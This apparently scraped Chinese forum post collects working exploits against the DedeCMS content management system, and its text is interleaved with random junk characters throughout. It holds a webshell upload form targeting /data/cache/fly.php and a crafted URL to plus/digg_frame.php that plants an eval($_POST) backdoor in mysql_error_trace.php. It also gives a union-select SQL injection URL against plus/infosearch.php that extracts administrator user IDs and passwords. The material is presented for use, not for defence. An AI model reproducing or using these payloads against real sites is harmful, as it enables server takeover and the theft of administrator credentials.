9 U# w( m0 g6 g& i$ @- w<input type='hidden' name='job' value='upload' />& [. x. x; o) O# s3 v
<input type='hidden' name='newname' value='fly.php' />" V0 g5 N& o4 _/ G% F$ {* @) ^# Z
Select U Shell <input type='file' name='uploadfile' size='25' />& G) u8 \: T: N, h8 ?. I
<input type='submit' name='sb1' value='确定' />
  Q2 u( a1 U2 m; Q$ a+ h</form>& S" R% B3 g1 l$ Q# M
<br />It's just a exp for the bug of Dedecms V55...<br />
" s0 K3 U2 A1 ONeed register_globals = on...<br />2 J3 f* G# e. O) q1 U- K
Fun the game,get a webshell at /data/cache/fly.php...<br />8 ?+ \# Z: ^- L- F% x: W& d* N0 a
</body>
. L6 y0 a! U! h+ X& b# V' h</html>! p( r- g- L& M  v; X0 r

+ }9 f7 m8 ?, b% x$ B! y! H* ?( ]
0 J# g, g! ^+ q3 j* V' T7 ]9 ~  N  {/ {( I- h9 _' p+ v8 m' n2 x8 ^

/ X! c  G" H' B* P+ c: E  S3 D" q( n, O2 y1 ]" \
$ N/ j" l+ k" ?% ~, I, W
! U& {8 q8 ~" h/ B8 t
9 j7 i0 r9 Z7 D+ s7 Y' y
/ o( a$ v5 @, R+ B" N9 o
) l5 B& j6 i" N0 s7 T& h
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
( V/ S" T7 u  C1 W利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。7 [5 g7 A9 P9 L9 X! v
1. 访问网址：7 @* @* k& k3 Z5 C
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>- e) N( K5 o. g% ^* t
可看见错误信息+ v3 ?( U8 B' \2 L0 Q# I

) c) \6 K8 b; v! o' O4 g
- [5 F! R" ~/ M7 ]0 W2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。. M+ [. I) s6 P* ?7 T8 J
int(3) Error: Illegal double '1024e1024' value found during parsing; Z; j- v0 }4 N' r2 {( M
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
# x: K4 S. z% ]4 z, t! h4 m% Z# k: o+ }

+ x) n6 |: [( V* n$ o6 b" t3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是
  F* l; J" a" W0 S" V7 K5 o% r9 ~3 \. U5 N! v$ W! E* a

2 ?# W& e$ P3 O! k1 V; o<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>' p1 v) J3 P9 `. \/ ~- x
' {& {0 G# A) B8 N

8 F8 @+ y5 V* ~按确定后的看到第2步骤的信息表示文件木马上传成功.  {7 D9 u5 W8 B* p' M
: m( c: P+ V) s, k; w
' b" S9 y# Z/ k2 Z
  v- z- s. }0 r

! p+ ^/ b  [" k8 m1 \% S6 _, @! J% ?. U4 s4 Y

/ M7 P% X+ Q5 ]3 R! y
* [, Y2 Y6 D4 W1 p& y
# O7 B+ Y3 h3 H) f& j9 `( N  x0 S4 ?/ c$ d3 \3 z' R3 m' u& v

+ |3 F) I( f8 Y' F8 y* Z* i! c5 P, H/ }& K5 g- T
5 C, L& x, N  K$ ]
织梦(DedeCms)plus/infosearch.php 文件注入漏洞+ w  m  r. H, b) ?! f
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

		自动登录	找回密码
密码			立即注册